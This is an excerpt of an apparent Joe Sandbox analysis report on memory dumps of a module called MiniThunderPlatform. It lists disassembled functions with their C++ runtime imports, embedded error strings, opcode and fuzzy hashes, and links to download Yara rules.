                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD504
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD50B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD512
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100BD520
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100BD54D
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 100BD55D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?), ref: 100BD572
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,00000000), ref: 100BD5A4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@D@std@@@std@@$??$?6D@std@@@0@V10@V?$basic_ostream@$??6?$basic_ostream@ExceptionThrowV01@V12@$??0?$basic_string@??0?$basic_stringstream@??0exception@@?assign@?$basic_string@?erase@?$basic_string@?str@?$basic_stringstream@D@2@@2@V?$basic_string@
                                                                                                                                              • String ID: ] is greater than buffer size[$]! it's illegal!$string length [
                                                                                                                                              • API String ID: 375490266-2902506487
                                                                                                                                              • Opcode ID: 347c69cfd8f4dc2dc61f23d7f2047c3f056b69b741702c6ee95d9f1a96726a81
                                                                                                                                              • Instruction ID: ea9148073c1c2b5b1cc063011b159885b4a362f79c2f0eebe55b2d598d16b2d3
                                                                                                                                              • Opcode Fuzzy Hash: 347c69cfd8f4dc2dc61f23d7f2047c3f056b69b741702c6ee95d9f1a96726a81
                                                                                                                                              • Instruction Fuzzy Hash: 50315A75504750AFC324DF54CC98B9BB7E9FB98710F04CA1EE59A932A0EB74A848CB52
                                                                                                                                              Function 100C402E Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 70COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4033
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_change_ex,?), ref: 100C404D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Can't get setting instance!), ref: 100C406D
                                                                                                                                                • Part of subcall function 100C36BF: ??0exception@@QAE@ABQBD@Z.MSVCR71(-00000050,?,00000000,100C4082,-00000050), ref: 100C36DF
                                                                                                                                              • _CxxThrowException.MSVCR71(-00000018,102CA7C4,-00000050), ref: 100C408B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(max_url_length), ref: 100C4095
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hub_agent), ref: 100C40AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(-00000034,-00000050,000000FF), ref: 100C40D5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C40E2
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-0000006C), ref: 100C4110
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C411D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$??0exception@@??4?$basic_string@?assign@?$basic_string@ExceptionH_prologThrowV01@V12@V12@@
                                                                                                                                              • String ID: Can't get setting instance!$cmd_report_change_ex$hub_agent$max_url_length
                                                                                                                                              • API String ID: 4028102758-2769586971
                                                                                                                                              • Opcode ID: 81686647557379cc857c74810f53677f38f3d091b76f3c3168a444730de91423
                                                                                                                                              • Instruction ID: e2be55161009ce298ec2c0ffa1c38c26361e4c4eff7dc68ebcc3296d8c782fb1
                                                                                                                                              • Opcode Fuzzy Hash: 81686647557379cc857c74810f53677f38f3d091b76f3c3168a444730de91423
                                                                                                                                              • Instruction Fuzzy Hash: 2D314D75800214EFD714DBA4D98DADEB7F8FB58310F10829AE55AA32A1DB706649CF20
                                                                                                                                              Function 10071050 Relevance: 24.1, APIs: 16, Instructions: 147COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100710AE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100710C0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100710CD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100710E7
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(-00000004,?), ref: 10071104
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071110
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071148
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071155
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071162
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071175
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,00000000,00000000), ref: 100711C8
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100711D8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10071214
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071221
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007122E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071241
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$?assign@?$basic_string@V12@$V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3584539511-0
                                                                                                                                              • Opcode ID: 40d36bbfcf0133ba706c6b6f6282cfcb0cbb3d809c5d4f17119fcbc4d2b987ad
                                                                                                                                              • Instruction ID: f58a367ca2644bf176cb83cca78dad60ae78a2b4f5d9a8a6b40c40e7f8b8fe0d
                                                                                                                                              • Opcode Fuzzy Hash: 40d36bbfcf0133ba706c6b6f6282cfcb0cbb3d809c5d4f17119fcbc4d2b987ad
                                                                                                                                              • Instruction Fuzzy Hash: C5616D35801299EFDB15CBA4CD98BDDBB78FF28700F0481C8E40AA3291DB746B48CB61
                                                                                                                                              Function 1009C320 Relevance: 24.1, APIs: 16, Instructions: 125COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C35B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C37B
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71 ref: 1009C392
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C3A0
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0), ref: 1009C3AD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C3C4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71 ref: 1009C3DB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C3E9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1009C3F4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000004,?), ref: 1009C40C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C41A
                                                                                                                                              • ?_Xran@_String_base@std@@QBEXXZ.MSVCP71 ref: 1009C443
                                                                                                                                              • isdigit.MSVCR71 ref: 1009C458
                                                                                                                                              • atoi.MSVCR71(?), ref: 1009C479
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C494
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009C4AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V12@$??1?$basic_string@$??0?$basic_string@$?assign@?$basic_string@$??4?$basic_string@String_base@std@@V01@Xran@_atoiisdigit
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1359773806-0
                                                                                                                                              • Opcode ID: 2c58bd1515e36e1574df08adca8208c1c479dec3ea968dfc29632d96b6873907
                                                                                                                                              • Instruction ID: a6cb40dfec928b1cb81f4ef97796928c222e3b169600aac6509c1af046fbb859
                                                                                                                                              • Opcode Fuzzy Hash: 2c58bd1515e36e1574df08adca8208c1c479dec3ea968dfc29632d96b6873907
                                                                                                                                              • Instruction Fuzzy Hash: E4517B715083959FC310DF68C89CA5BBBE4FFA9B40F500A5DF596832A1DB70A948CB53
                                                                                                                                              Function 100D024B Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100D0261
                                                                                                                                                • Part of subcall function 1007C7F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,1007C745), ref: 1007C804
                                                                                                                                                • Part of subcall function 100019A2: __EH_prolog.LIBCMT ref: 100019A7
                                                                                                                                                • Part of subcall function 100019A2: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP71(?,00000000,?,7C3CC1BB,?,10277CA8), ref: 10001B0B
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D02B3
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100D02BA
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100D02C1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D02D5
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100D02E7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100D033C
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100D034D
                                                                                                                                                • Part of subcall function 100C8450: GetTickCount.KERNEL32 ref: 100C846E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6??1?$basic_string@D@std@@@0@V10@V?$basic_ostream@$??0?$basic_string@??0?$basic_stringstream@??6?$basic_ostream@?clear@ios_base@std@@?str@?$basic_stringstream@CountD?$basic_stringstream@D@2@@2@H_prologTickV01@V01@@V?$basic_string@
                                                                                                                                              • String ID: no: $ occur exception, handle_open_notify return cheat$"$#$$
                                                                                                                                              • API String ID: 3239417577-3109471907
                                                                                                                                              • Opcode ID: 2b3622a7b044e97c98631889bcce40a8ca684016522099ac0868a473d4c90601
                                                                                                                                              • Instruction ID: 010db44bb53781b341a33ac555776d7175102d4b03f77830d910ac85552fd368
                                                                                                                                              • Opcode Fuzzy Hash: 2b3622a7b044e97c98631889bcce40a8ca684016522099ac0868a473d4c90601
                                                                                                                                              • Instruction Fuzzy Hash: 6D416E746043409FD324CB60C899BEFB7E8FB98704F004A5DF99A47282DB746648CB66
                                                                                                                                              Function 100B9280 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 343COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100B4B70: ??3@YAXPAX@Z.MSVCR71(00000000), ref: 100B4C70
                                                                                                                                                • Part of subcall function 100E0440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E0541
                                                                                                                                                • Part of subcall function 100E0440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100E0556
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9385
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B94A4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B94B9
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B94CE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9553
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9568
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B957D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9602
                                                                                                                                                • Part of subcall function 100BB5C0: RtlEnterCriticalSection.NTDLL(?), ref: 100BB5ED
                                                                                                                                                • Part of subcall function 100BB5C0: ??3@YAXPAX@Z.MSVCR71(?,?,00000000,00000000), ref: 100BB605
                                                                                                                                                • Part of subcall function 100BB5C0: RtlLeaveCriticalSection.NTDLL(?), ref: 100BB68A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B9764
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@CriticalSection$EnterLeave
                                                                                                                                              • String ID: .\p2s_task_event_handler.cpp$1 == resources.size()$thunder_assert
                                                                                                                                              • API String ID: 3477921314-3444617723
                                                                                                                                              • Opcode ID: 3cd37d0b65de69dfe6cd42d2f27d6c93b91efa8b0188e64e6b8cfa32cc010b3e
                                                                                                                                              • Instruction ID: 0d43541becff4b42aecb5e3f9a0b45c1be7c0450929e1a9b6d65aef093674849
                                                                                                                                              • Opcode Fuzzy Hash: 3cd37d0b65de69dfe6cd42d2f27d6c93b91efa8b0188e64e6b8cfa32cc010b3e
                                                                                                                                              • Instruction Fuzzy Hash: 17E14E741047419FD324CF64C884BEBB7E5FF99304F008A5DF59A87292DB74A945CBA2
                                                                                                                                              Function 100BD690 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 102COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100BD1D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer is insufficient to read!), ref: 100BD1FF
                                                                                                                                                • Part of subcall function 100BD1D0: _CxxThrowException.MSVCR71(?,102C95EC), ref: 100BD225
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100BD6D5
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(?,cid length [,?,] is greater than buffer size[,?,]! it's illegal!), ref: 100BD701
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD708
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD70F
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71 ref: 100BD716
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100BD71D
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100BD72B
                                                                                                                                              • ??0exception@@QAE@ABQBD@Z.MSVCR71(?), ref: 100BD758
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B2A60), ref: 100BD768
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$D@std@@V?$allocator@$??$?6D@2@@std@@D@std@@@0@V10@V?$basic_ostream@$??6?$basic_ostream@ExceptionThrowV01@$??0?$basic_string@??0?$basic_stringstream@??0exception@@?str@?$basic_stringstream@D@2@@2@V?$basic_string@
                                                                                                                                              • String ID: ] is greater than buffer size[$]! it's illegal!$cid length [
                                                                                                                                              • API String ID: 402251085-4149185117
                                                                                                                                              • Opcode ID: 3fcb5fa2b769eaa6f74d77f673e35a31a394b1d169b2a1d1a68d14b9ba60d2a5
                                                                                                                                              • Instruction ID: 0eb750283b75a7a9ec0eedc78d4c8c745b0774a8925fd6f4189161b17c06a240
                                                                                                                                              • Opcode Fuzzy Hash: 3fcb5fa2b769eaa6f74d77f673e35a31a394b1d169b2a1d1a68d14b9ba60d2a5
                                                                                                                                              • Instruction Fuzzy Hash: 5231AE75504344DFC714DF64CC88A9AFBE9FB88700F44896EE84A9B351EB35D948CBA1
                                                                                                                                              Function 10045530 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 97COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(SSL send: get_complete_result call error), ref: 1004556F
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 1004559D
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
